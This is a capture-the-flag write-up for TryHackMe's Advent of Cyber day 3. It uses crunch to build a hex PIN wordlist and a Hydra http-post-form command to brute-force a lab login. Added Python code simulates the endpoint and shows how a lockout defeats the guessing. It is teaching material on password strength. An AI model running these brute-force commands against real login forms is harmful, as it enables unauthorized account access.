THM day 3 - Advent of Cyber

The third day is about brute forcing, and about counting PIN and password possibilities. I have to brute force a secret PIN: I use Crunch to generate a wordlist and Hydra to brute force the PIN.

Counting PIN possibilities

A lot of systems rely on PIN codes or passwords for authentication. These systems can easily be attacked by guessing if no countermeasures are in place, such as a minimum length, rate limiting or lockout after repeated failures.

Imagine we have a four-digit PIN. Each digit can be one of ten values (0,1,2,3,4,5,6,7,8,9), so there are 10^4 = 10,000 possibilities in total.

Counting password possibilities

Imagine a password where each character can be:

  • A digit 0-9
  • Uppercase letter A-Z
  • Lowercase letter a-z

That is 10 + 26 + 26 = 62 choices per character. If the password is 8 characters long, we can make 62^8 = 218,340,105,584,896 different passwords.

The challenge

Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Solution walkthrough

Upon opening the website, it shows the following interface, with the options 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F: all sixteen hexadecimal digits.

https://i.imgur.com/sTYWJOY.png

The PIN field takes a maximum of 3 characters, so the keyspace is 16^3 = 4096 codes.
https://i.imgur.com/vQIC48M.png

With the wrong code, access is denied
https://i.imgur.com/0taDBYN.png

In order to get in I need to brute force the password.

Crunch

Crunch is an amazing tool: one command generates a wordlist with all the possibilities. The first two arguments are the minimum and maximum length, the third is the character set: crunch 3 3 0123456789ABCDEF -o 3digits.txt


DuxSec@hi$ crunch 3 3 0123456789ABCDEF -o 3digits.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output


DuxSec@hi$ tail 3digits.txt                          
FF6
FF7
FF8
FF9
FFA
FFB
FFC
FFD
FFE
FFF

Great, I have all 4096 options, the next step is to automate the 'login' process using Hydra.
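As an added example (not part of the original write-up, and not crunch's own code), the following Python reproduces what the crunch command above does and ties it back to the counting section: it computes the keyspaces discussed on this page (10^4, 62^8 and the challenge's 16^3), generates the same 4096 candidates in the same order crunch uses, checks the 16384-byte figure crunch printed, and shows how long exhausting each keyspace takes at an assumed attempt rate. The file name 3digits.txt, the hex charset and the 16 attempts per second are taken or assumed from this page, nothing else is known about the target.

```python
import itertools
from typing import Iterator

# Stand-in for the crunch run on this page:
#   crunch 3 3 0123456789ABCDEF -o 3digits.txt
HEX_CHARSET = "0123456789ABCDEF"


def keyspace(charset_size: int, length: int) -> int:
    """Number of distinct codes of `length` symbols, each drawn from `charset_size` symbols."""
    return charset_size ** length


def wordlist_size_bytes(charset_size: int, length: int) -> int:
    """Size of a one-candidate-per-line wordlist (crunch's 'amount of data' figure)."""
    return keyspace(charset_size, length) * (length + 1)   # +1 for the newline


def generate_wordlist(charset: str, length: int) -> Iterator[str]:
    """Yield every fixed-length combination in crunch's order: the leftmost symbol
    changes slowest, so for hex the list runs 000, 001, ... FFE, FFF."""
    for combo in itertools.product(charset, repeat=length):
        yield "".join(combo)


def seconds_to_exhaust(charset_size: int, length: int, attempts_per_second: float) -> float:
    """Worst-case time to submit every candidate at a sustained attempt rate."""
    return keyspace(charset_size, length) / attempts_per_second


if __name__ == "__main__":
    # The three keyspaces discussed on this page.
    print(keyspace(10, 4))    # 10000: four-digit PIN
    print(keyspace(62, 8))    # 218340105584896: eight alphanumeric characters
    print(keyspace(16, 3))    # 4096: three hex digits, the challenge target

    # Reproduce 3digits.txt with the same content as the crunch command.
    with open("3digits.txt", "w") as fh:
        for word in generate_wordlist(HEX_CHARSET, 3):
            fh.write(word + "\n")
    print(wordlist_size_bytes(16, 3))   # 16384 bytes, matching crunch's estimate

    # Why the challenge falls and an 8-character password does not. The rate of
    # 16 attempts per second is an assumption (one per hydra task), not measured.
    print(seconds_to_exhaust(16, 3, 16))                 # 256.0 seconds
    print(seconds_to_exhaust(62, 8, 16) / 31_557_600)    # hundreds of thousands of years
```

The byte count check is a cheap sanity test before a long run: if crunch's estimate and count * (length + 1) disagree, the charset or length arguments are not what you think they are.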

Hydra

Capturing an invalid login attempt shows me the details of the request. It sends a POST request to /login.php containing the body pin=<my_pin>, and the response for a wrong PIN contains the text "Access denied".
https://i.imgur.com/ixhuWsC.png

With that information I can build the brute-force command. -l '' passes an empty username (the form has no user field), -P takes the wordlist, -s 8000 sets the port, and the http-post-form argument is path:POST body:failure string. Hydra substitutes each wordlist entry for ^PASS^ and treats any response that does not contain "Access denied" as a hit (prefix the third field with S= to match on a success string instead).
hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied"


DuxSec@hi$ hydra -l '' -P 3digits.txt 10.10.188.183 -s 8000 http-post-form "/login.php:pin=^PASS^:Access denied" 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 11:50:44
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://10.10.188.183:8000/login.php:pin=^PASS^:Access denied
[8000][http-post-form] host: 10.10.188.183   password: 6F5

And Hydra found the password: 6F5.
Trying it successfully logs me in.

https://i.imgur.com/Rf9i5G2.png
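As an added example (not part of the original write-up, and not Hydra's code), the following Python simulates the login endpoint and runs the same loop Hydra's http-post-form module runs against it, so you can see how the failure-string match works and where it breaks. The page only shows that POST /login.php with pin=<code> answers "Access denied" for a wrong PIN and logs you in with 6F5; the "Access granted" wording, the "Account locked" response and the five-failure lockout are assumptions added to show what a countermeasure does to the attack, not properties of the real box.

```python
import itertools
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional, Tuple

# Constructed stand-in for the challenge target. Only FAILURE_STRING and
# SECRET_PIN come from the page; the rest is assumed for the simulation.
FAILURE_STRING = "Access denied"
SUCCESS_STRING = "Access granted"   # assumed wording of the success page
SECRET_PIN = "6F5"                  # the PIN hydra recovered on this page


def hex_candidates(length: int) -> Iterator[str]:
    """Same candidates as `crunch 3 3 0123456789ABCDEF`, in the same order."""
    return ("".join(c) for c in itertools.product("0123456789ABCDEF", repeat=length))


@dataclass
class FakeLoginEndpoint:
    """Simulates /login.php. max_failures=None reproduces the challenge (no lockout)."""
    secret: str
    max_failures: Optional[int] = None
    failures: int = 0
    locked: bool = False

    def post_login(self, pin: str) -> str:
        """Return the body the server would send for POST /login.php, pin=<pin>."""
        if self.locked:
            return "Account locked"          # assumed lockout response
        if pin == self.secret:
            return SUCCESS_STRING
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            self.locked = True
        return FAILURE_STRING


def brute_force(endpoint: FakeLoginEndpoint, candidates: Iterable[str],
                failure_string: Optional[str] = None,
                success_string: Optional[str] = None) -> Tuple[Optional[str], int]:
    """Hydra-style http-post-form loop. With failure_string (hydra's default, the
    third field of the module spec) any response lacking that text is a hit.
    With success_string (hydra's S= prefix) only a response containing it counts.
    Returns (pin_or_None, number_of_requests_sent)."""
    if failure_string is None and success_string is None:
        raise ValueError("need a failure string or a success string to match on")
    tries = 0
    for pin in candidates:
        tries += 1
        body = endpoint.post_login(pin)
        if success_string is not None:
            hit = success_string in body
        else:
            hit = failure_string not in body
        if hit:
            return pin, tries
    return None, tries


if __name__ == "__main__":
    # 1. The challenge as on this page: no lockout, failure-string matching.
    target = FakeLoginEndpoint(SECRET_PIN)
    print(brute_force(target, hex_candidates(3), failure_string=FAILURE_STRING))
    # ('6F5', 1782): 6F5 is the 1782nd line of 3digits.txt when tried in order

    # 2. Same attack against a server that locks after five failures. The lockout
    #    page no longer says "Access denied", so failure-string matching reports
    #    a false positive: hydra would print a wrong "password".
    locked = FakeLoginEndpoint(SECRET_PIN, max_failures=5)
    print(brute_force(locked, hex_candidates(3), failure_string=FAILURE_STRING))
    # ('005', 6)

    # 3. Matching on the success string gives no false positive, but the lockout
    #    still defeats the attack: 4096 requests, nothing found.
    locked = FakeLoginEndpoint(SECRET_PIN, max_failures=5)
    print(brute_force(locked, hex_candidates(3), success_string=SUCCESS_STRING))
    # (None, 4096)
```

The second run is the practical caveat: Hydra's default match is "anything that is not the failure page", so a lockout page, a rate-limit error or a WAF block page is reported as a valid password. Always log in by hand with the reported value, as the write-up does, and prefer an S= success string when the success page has a stable marker.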

Takeaways

  • Use long passwords from a large character set: a 3-hex-digit PIN has only 16^3 = 4096 possibilities, an 8-character alphanumeric password has 62^8
  • Take countermeasures such as rate limiting or lockout; the challenge target let Hydra guess freely
  • Hydra is a great tool to brute force login forms
  • Crunch is amazing at generating custom wordlists